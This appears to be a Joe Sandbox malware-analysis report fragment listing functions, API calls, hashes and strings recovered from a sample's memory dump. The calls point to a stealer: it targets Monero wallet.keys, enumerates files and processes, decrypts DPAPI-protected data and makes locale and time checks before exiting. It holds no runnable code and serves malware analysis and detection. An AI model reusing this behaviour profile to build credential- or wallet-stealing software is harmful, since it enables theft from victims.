                              • API String ID: 2325840235-1173974218
                              • Opcode ID: 36de6c2028cebc227188ab31c5da131c63b4d14eff2f73240be8486b4a349527
                              • Instruction ID: 79f608be46df9762fb2ba7a0cd91c9d20c4957377c76702e7370b128dc85c884
                              • Opcode Fuzzy Hash: 36de6c2028cebc227188ab31c5da131c63b4d14eff2f73240be8486b4a349527
                              • Instruction Fuzzy Hash: 03F190718151189ADB59FBA0CC95EEE737ABF14301F8042DDA80A62091EF306F8ECF55
                              APIs
                                • Part of subcall function 0065A740: lstrcpy.KERNEL32(00660E17,00000000), ref: 0065A788
                                • Part of subcall function 0065A920: lstrcpy.KERNEL32(00000000,?), ref: 0065A972
                                • Part of subcall function 0065A920: lstrcat.KERNEL32(00000000), ref: 0065A982
                                • Part of subcall function 0065A9B0: lstrlen.KERNEL32(?,013D8948,?,\Monero\wallet.keys,00660E17), ref: 0065A9C5
                                • Part of subcall function 0065A9B0: lstrcpy.KERNEL32(00000000), ref: 0065AA04
                                • Part of subcall function 0065A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0065AA12
                                • Part of subcall function 0065A8A0: lstrcpy.KERNEL32(?,00660E17), ref: 0065A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006614B0,00660C2A), ref: 0064DAEB
                              • StrCmpCA.SHLWAPI(?,006614B4), ref: 0064DB33
                              • StrCmpCA.SHLWAPI(?,006614B8), ref: 0064DB49
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0064DDCC
                              • FindClose.KERNEL32(000000FF), ref: 0064DDDE
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                               • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID:
                              • API String ID: 3334442632-0
                              • Opcode ID: 43bc0b9c4dc68404ff9dfc36345246c70f7285bbfcbecdb5b738eddc884d5493
                              • Instruction ID: 49fa8dfb5cc30e6d458c9de124224862b02cf5fb8d8dc8eef83f3c2680f9c494
                              • Opcode Fuzzy Hash: 43bc0b9c4dc68404ff9dfc36345246c70f7285bbfcbecdb5b738eddc884d5493
                              • Instruction Fuzzy Hash: 699162729001049BDB54FBB0EC569ED777EAF88301F40866DFD0A96181EE349B0D8B96
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                               • Associated: the other 14 regions of the same dump set (00640000 through 00CDE000), as listed in full under the first function above
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: $}?$(U\$1?w$:~n@$;VW$R'?G$reo_$Vo$[>
                              • API String ID: 0-3545384221
                              • Opcode ID: 28a73d0de069be78ab026618c167c3656d21c513187d31b2cd30d5db053c024c
                              • Instruction ID: f76be33c4ac418af641ec9fd438cfbc782f388552e6a5882af5d5ee0073bae05
                              • Opcode Fuzzy Hash: 28a73d0de069be78ab026618c167c3656d21c513187d31b2cd30d5db053c024c
                              • Instruction Fuzzy Hash: F5B22CF360C2049FE304BE2DEC8567AFBE9EB94720F16463DE6C4C7744EA3598058696
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                               • Associated: the other 14 regions of the same dump set (00640000 through 00CDE000), as listed in full under the first function above
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: +JP}$;wk$>j^~$n__s$r6[>${.$~@Zo$N{
                              • API String ID: 0-2004928298
                              • Opcode ID: 7e4b40676eabd92559af093d39cac265a45531968c899d428bdf043682f88879
                              • Instruction ID: 36ee9d2bdb58acf911b0fc45d740b3351266aa0757ef9490b97ed1ddd94cd78f
                              • Opcode Fuzzy Hash: 7e4b40676eabd92559af093d39cac265a45531968c899d428bdf043682f88879
                              • Instruction Fuzzy Hash: FAB25BF3A082049FE3046E2DEC8567ABBE9EBD4320F1A463DEAC4C3744E97558058697
                              APIs
                                • Part of subcall function 0065A740: lstrcpy.KERNEL32(00660E17,00000000), ref: 0065A788
                              • GetKeyboardLayoutList.USER32(00000000,00000000,006605AF), ref: 00657BE1
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00657BF9
                              • GetKeyboardLayoutList.USER32(?,00000000), ref: 00657C0D
                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00657C62
                              • LocalFree.KERNEL32(00000000), ref: 00657D22
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                               • Associated: the other 14 regions of the same dump set (00640000 through 00CDE000), as listed in full under the first function above
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                              • String ID: /
                              • API String ID: 3090951853-4001269591
                              • Opcode ID: e00e6315fadfb00270080593d70117b134527e5a06b3937011063068e7dd7570
                              • Instruction ID: 48e6865030e43fd2c7f31c76c8a7b9c519048ecb246d8d0cd0fa44296d1454cd
                              • Opcode Fuzzy Hash: e00e6315fadfb00270080593d70117b134527e5a06b3937011063068e7dd7570
                              • Instruction Fuzzy Hash: 47417F71941218ABDB24DF94DC89BEEB379FF44701F2042D9E80962280DB342F89CFA5
                              APIs
                                • Part of subcall function 0065A740: lstrcpy.KERNEL32(00660E17,00000000), ref: 0065A788
                                • Part of subcall function 0065A920: lstrcpy.KERNEL32(00000000,?), ref: 0065A972
                                • Part of subcall function 0065A920: lstrcat.KERNEL32(00000000), ref: 0065A982
                                • Part of subcall function 0065A9B0: lstrlen.KERNEL32(?,013D8948,?,\Monero\wallet.keys,00660E17), ref: 0065A9C5
                                • Part of subcall function 0065A9B0: lstrcpy.KERNEL32(00000000), ref: 0065AA04
                                • Part of subcall function 0065A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0065AA12
                                • Part of subcall function 0065A8A0: lstrcpy.KERNEL32(?,00660E17), ref: 0065A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00660D73), ref: 0064E4A2
                              • StrCmpCA.SHLWAPI(?,006614F8), ref: 0064E4F2
                              • StrCmpCA.SHLWAPI(?,006614FC), ref: 0064E508
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0064EBDF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                               • Associated: the other 14 regions of the same dump set (00640000 through 00CDE000), as listed in full under the first function above
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 433455689-1173974218
                              • Opcode ID: 0b38b9256b65a9754f4abc4a488aef977bb6811567042b5d03e6c2109c4ae7d1
                              • Instruction ID: 699e5346b900cf0f02b348eb469e903e54662ff56203177b89e96bf4d1e31ff1
                              • Opcode Fuzzy Hash: 0b38b9256b65a9754f4abc4a488aef977bb6811567042b5d03e6c2109c4ae7d1
                              • Instruction Fuzzy Hash: 84123F719101189ADB58FBA0DC96EED737ABF54301F4042ADB90AA6091FF306F4DCB96
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                               • Associated: the other 14 regions of the same dump set (00640000 through 00CDE000), as listed in full under the first function above
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: =2%$ORw$`w$mo_$w==$'/~
                              • API String ID: 0-2222603712
                              • Opcode ID: 009641a9a739f931b2f3c5b84000d95c7f82fdedc8706b8b5a2754089b4ab6d7
                              • Instruction ID: 1b6f82830c3997968cf233e3f831d27cb3b48713cc56bceff284214bf8765b94
                              • Opcode Fuzzy Hash: 009641a9a739f931b2f3c5b84000d95c7f82fdedc8706b8b5a2754089b4ab6d7
                              • Instruction Fuzzy Hash: 8FB236F360C2049FE3046E29EC8567AFBE5EF94720F1A893DEAC5C3744EA3558058796
                              APIs
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nd,00000000,00000000), ref: 00649AEF
                              • LocalAlloc.KERNEL32(00000040,?,?,?,00644EEE,00000000,?), ref: 00649B01
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nd,00000000,00000000), ref: 00649B2A
                              • LocalFree.KERNEL32(?,?,?,?,00644EEE,00000000,?), ref: 00649B3F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                               • Associated: the other 14 regions of the same dump set (00640000 through 00CDE000), as listed in full under the first function above
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptLocalString$AllocFree
                              • String ID: Nd
                              • API String ID: 4291131564-3222557526
                              • Opcode ID: c66f75e49a02cfe5839a5ef9c1c233b297ac7f878bd1b31b05d820d8d19874c1
                              • Instruction ID: 04e72949c17458309812e508d5465314a73bc623f753411aece7c36b3bda8f30
                              • Opcode Fuzzy Hash: c66f75e49a02cfe5839a5ef9c1c233b297ac7f878bd1b31b05d820d8d19874c1
                              • Instruction Fuzzy Hash: AF11A2B4240208AFEB14CF64DC95FAA77B5FB89700F208059FA159B3D0C7B6A901CBA0
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                               • Associated: the other 14 regions of the same dump set (00640000 through 00CDE000), as listed in full under the first function above
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 'p{$I%s{$frO>$gv;$w
                              • API String ID: 0-3016317580
                              • Opcode ID: 45192a7bd68ffc9b8b645bb031a9d0d7c51ab2ac583272eea453ec47af544d8d
                              • Instruction ID: ce88c6e4647c9b4d79c59f1225b9dc1952ae4a5c31b304c691d2a190b0ee560e
                              • Opcode Fuzzy Hash: 45192a7bd68ffc9b8b645bb031a9d0d7c51ab2ac583272eea453ec47af544d8d
                              • Instruction Fuzzy Hash: 74B23BF3A0C2109FE304AE2DEC8567ABBE9EBD4720F1A463DEAC4C7744E53558058693
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                               • Associated: the other 14 regions of the same dump set (00640000 through 00CDE000), as listed in full under the first function above
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: QB;$";s$$^]'$^%N$i:
                              • API String ID: 0-2810595
                              • Opcode ID: 0dd1ea09a176fe51b80d160169fdeaebd61242f1c9e4b766091b4556310bb57e
                              • Instruction ID: 1d372d944b0dea19b5e0fd301321eb9b488f36c7e92fffab81dd436064f8f7e4
                              • Opcode Fuzzy Hash: 0dd1ea09a176fe51b80d160169fdeaebd61242f1c9e4b766091b4556310bb57e
                              • Instruction Fuzzy Hash: 77B2C0F360C6149FE304AF2DDC8567ABBE5EF94720F16492DEAC4C7744EA3598008A97
                              APIs
                              • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0064C871
                              • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0064C87C
                              • lstrcat.KERNEL32(?,00660B46), ref: 0064C943
                              • lstrcat.KERNEL32(?,00660B47), ref: 0064C957
                              • lstrcat.KERNEL32(?,00660B4E), ref: 0064C978
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                               • Associated: the other 14 regions of the same dump set (00640000 through 00CDE000), as listed in full under the first function above
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$BinaryCryptStringlstrlen
                              • String ID:
                              APIs
                              • GetSystemTime.KERNEL32(?), ref: 0065696C
                              • sscanf.NTDLL ref: 00656999
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 006569B2
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 006569C0
                              • ExitProcess.KERNEL32 ref: 006569DA
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                               • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmp
                              Similarity
                              • API ID: Time$System$File$ExitProcesssscanf
                              • String ID:
                              APIs
                              • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0064724D
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00647254
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00647281
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 006472A4
                              • LocalFree.KERNEL32(?), ref: 006472AE
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              Similarity
                              • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                              • String ID:
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0065961E
                              • Process32First.KERNEL32(00660ACA,00000128), ref: 00659632
                              • Process32Next.KERNEL32(00660ACA,00000128), ref: 00659647
                              • StrCmpCA.SHLWAPI(?,00000000), ref: 0065965C
                              • CloseHandle.KERNEL32(00660ACA), ref: 0065967A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              Similarity
                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                              • String ID:
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              Similarity
                              • API ID:
                              • String ID: =Ym$CB}$R\ho$rlW
                              APIs
                              • CryptBinaryToStringA.CRYPT32(00000000,00645184,40000001,00000000,00000000,?,00645184), ref: 00658EC0
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              Similarity
                              • API ID: BinaryCryptString
                              • String ID:
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,013DE4D8,00000000,?,00660E10,00000000,?,00000000,00000000), ref: 00657A63
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00657A6A
                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,013DE4D8,00000000,?,00660E10,00000000,?,00000000,00000000,?), ref: 00657A7D
                              • wsprintfA.USER32 ref: 00657AB7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              Similarity
                              • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                              • String ID:
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              Similarity
                              • API ID:
                              • String ID: Ut_$cS~o$hDzu
                              APIs
                              • CoCreateInstance.COMBASE(0065E118,00000000,00000001,0065E108,00000000), ref: 00653758
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 006537B0
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              Similarity
                              • API ID: ByteCharCreateInstanceMultiWide
                              • String ID:
                              APIs
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00649B84
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 00649BA3
                              • LocalFree.KERNEL32(?), ref: 00649BD3
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              Similarity
                              • API ID: Local$AllocCryptDataFreeUnprotect
                              • String ID:
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Similarity
                              • API ID:
                              • String ID: !&oo$Rwa
                              • API String ID: 0-1885050741
                              • Opcode ID: 58f6d2ba12da48e77bb6b1aaedd064402fc28dab5cfb5ed314d740071e813ab5
                              • Instruction ID: 12becacc7b8841fb28759fe8791347db4d4a6c3c6de8f770b7d7bad547aebd8f
                              • Opcode Fuzzy Hash: 58f6d2ba12da48e77bb6b1aaedd064402fc28dab5cfb5ed314d740071e813ab5
                              • Instruction Fuzzy Hash: 37A2D3F3A0C2109FE304AF29EC8567ABBE5EB94720F16493DEAC5C7340E63598458797
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Similarity
                              • API ID:
                              • String ID: _M~$b{O.
                              • API String ID: 0-665563910
                              • Opcode ID: d926ce5ceee59b1433aa85c29fee71d010bbb5a9c90e5ed33deae992b75814d9
                              • Instruction ID: 17d8066f39a024941f9193e7a3c6d47a97acd7b8c2f98e2d91c1fd0b7e501c35
                              • Opcode Fuzzy Hash: d926ce5ceee59b1433aa85c29fee71d010bbb5a9c90e5ed33deae992b75814d9
                              • Instruction Fuzzy Hash: AA72F7F3A0C2149FE304AE2DEC8567AFBE9EF94720F16892DE6C4C7744E63558018796
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Similarity
                              • API ID:
                              • String ID: ZG$ZG
                              • API String ID: 0-825320298
                              • Opcode ID: ebe0e66dce098f5cd390bce12dd004049fa78db9ec9edd0e368b5f04cded7022
                              • Instruction ID: 5024e0151c44287cea6434797389d5b9f24050718adcb2202c84fa49e50eaaf3
                              • Opcode Fuzzy Hash: ebe0e66dce098f5cd390bce12dd004049fa78db9ec9edd0e368b5f04cded7022
                              • Instruction Fuzzy Hash: 215115B3E082245BE300693DED4476AB7E5DB94760F1B853EEA88D7380E9359D0486D2
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Similarity
                              • API ID:
                              • String ID: .HY$Vf
                              • API String ID: 0-1769710356
                              • Opcode ID: 139ad79d262c54b3ef9a09aae947213edbca7d12d3827a706de6801c61ceb4ea
                              • Instruction ID: 4c9df6a0c6a81991f73437fc199ba7bf64c7878daf40a359f89b6cc91de44cb0
                              • Opcode Fuzzy Hash: 139ad79d262c54b3ef9a09aae947213edbca7d12d3827a706de6801c61ceb4ea
                              • Instruction Fuzzy Hash: 5B419DF3A0C7045BE30C6E2CEC95736B6D6EB94310F1A453CDA8587384FD751808868A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
